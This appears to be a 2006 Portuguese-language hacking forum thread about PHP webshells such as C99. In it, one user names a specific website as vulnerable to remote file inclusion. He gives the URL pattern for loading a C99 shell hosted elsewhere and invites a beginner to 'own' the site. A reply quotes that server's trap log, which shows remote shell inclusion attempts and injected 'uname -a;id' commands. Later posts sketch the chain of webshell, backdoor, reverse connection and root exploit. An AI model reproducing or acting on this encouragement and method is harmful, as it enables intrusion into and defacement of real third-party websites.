Vários PHP WebShells

Started by HadeS, 04 de June , 2006, 11:37:20 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Shady

#1
05 de June , 2006, 01:39:24 PM
Fonte? :)


Mundus Vult Decipi

HadeS

#2
05 de June , 2006, 07:01:59 PM
Hacking World.

Desculpe denovo. Mas foi tudo postado de uma vez só. Meus próximos posts terão fonte.

HadeS

Anonymous

#3
11 de June , 2006, 03:23:28 PM
será q dave p vc dar uma explicada no q cada coisa faz.
é q indo to comçando...

Wuefez

#4
12 de June , 2006, 04:15:28 AM
Quote from: "rapozza.anymalz"será q dave p vc dar uma explicada no q cada coisa faz.
é q indo to comçando...

Essas "shells php" tipo C99 são pras pessoas que não sabem colocar um backdoor de verdade na shell, e que também na maioria das vezes não sabem rootar, que acabam achando milhares de sites bugados mais que só ownam os sites que dão pra editar a index com o id do usuario do web server...

CSE na veia !!!

@rapozza.anymalz

A maioria das pessoas usa essas coisas como cmd, vou dar um exemplo real aqui vai um site bugado que eu achei hoje, com a técnica php injection (file inclusion):

http://www.freeklick.de/link.php?show=

Ai você diz o que tem de errado nessa url ?
No caso temos um include chamado show na pagina link.php, a sintaxe esta certa mais permite a inclusão de arquivos remotos, ou seja você pode fazer o PHP do site processar o que você quiser...

Ficando:

http://www.freeklick.de/link.php?show=h ... br/C99.txt

Pode ownar esse site se quiser, mais ve se deixa um greetz pra mim, ok ?


"Quem fala não faz."

Anonymous

#5
12 de June , 2006, 05:26:16 PM
valeu pelo dica, esclareceu basatante coisa
mas o link que você me passou...
olha o que tinha lá:

furtivo was here!!!
 ########## Trap Version 1.5 ##########
 
 Date: 26-02-2006 16:29:24
 Attempt: http://geocities.yahoo.com.br/ivissonc/neocmd.txt?
 Variable: show
 IP: 201.1.39.168
 Server: www.freeklick.de
 
 ########## Trap Version 1.5 ##########
 
 Date: 04-03-2006 19:38:43
 Attempt: uname -a;id
 Variable: cmd
 IP: unknown
 Server: www.freeklick.de
 
 ########## Trap Version 1.5 ##########
 
 Date: 04-03-2006 19:39:41
 Attempt: uname -a;idhttp://www.sistemafloresta.com.br/home/modulos.php?link=
 Variable: cmd
 IP: unknown
 Server: www.freeklick.de

e mais um monte.
o deface fica pra próxima.

Anonymous

#6
12 de June , 2006, 05:31:08 PM
Shell c99

Essa, eu conheço, muito boa.

DeamoN.Cheat

Anonymous

#7
14 de June , 2006, 08:37:01 AM
O Certo seria chamar de apenas CMD não de Shell, pq vc nesta parte do ataque você ainda não está na shell, está apenas usando uma cmd para tentar mandar um backdoor, ou intaum fazer uma conecção reversa, para que depois tendo acesso a shell do site possa rota-la sem problemas

HadeS

#8
14 de June , 2006, 02:41:36 PM
¬¬'

O que é uma Shell para você? Uma tela preta com letrinhas brancas onde você digita comandos e magicamente coisas acontecem?

Errado!

Shell é alguma interface que gera uma interação entre o usuário e o Sistema Operacional, por meios de comandos. A "CMD" (Como quiser) não é isso? Ela não gera uma interação entre você e o Sistema Operacional (Mesmo que remotamente. Por isso o nome WebShell)? Então acho que CMD é um nome um tanto quanto "chulo", prefiro WebShells.

Puff.

HadeS
Observação... Sinceramente, esse tipo de "receitas de bolo", usado pela maioria dos defacers, é uma coisa um tanto quanto ridícula. O único modo de Ownar um servidor é assim? Primeiro bata uma "CMD" num Include bem fresquinho, aí depois dá uma pitada de Backdoor, fazendo sempre Conexão Reversa, depois leve ao forno e terá uma "Shell", e pra um final espatacular, arranje um exploit com algum amigo para pode conseguir direitos de super-usuário (root) no sistema ("Rootar").

Anonymous

#9
14 de June , 2006, 11:26:20 PM
uiá qe hacker...
Copio o texto da onde ??

HadeS

#10
15 de June , 2006, 01:27:48 PM
Eu sou um tipo de pessoa que crio meus textos, como disse, não uso receitas feitas por outros.

E quando eu trago alguma coisa para cá de outros sites ponho a devida fonte. ;)

HadeS

Anonymous

#11
15 de June , 2006, 06:07:56 PM
sei...
também crio varios texto...
mas vc naum terá ah chance de le-os...
os meus textos soh tinham no antigo darkers..
mais aew agora tem novo textos..
mas agora só crio textos que me rendam algo...

BYe e algum moderador fecha o topico....

whit3_sh4rk

#12
15 de June , 2006, 06:45:52 PM
[f4kelive]
Não entendi o seu objetivo com esses posts.. Foram desnecessários..
E também não vejo motivos para fecharem o tópico, afinal de contas quem quis começar algum flame ou coisa do tipo aqui foi você mesmo.

[]s

Shady

#13
15 de June , 2006, 08:08:32 PM
Sinceramente... Darkfire, como o ws disse, faca-me um favor... Quero posts uteis aqui, ou de incentivo, ou ensinando, nao esse tipo de critica infundada...


Mundus Vult Decipi
Print
Go Up Pages1
User actions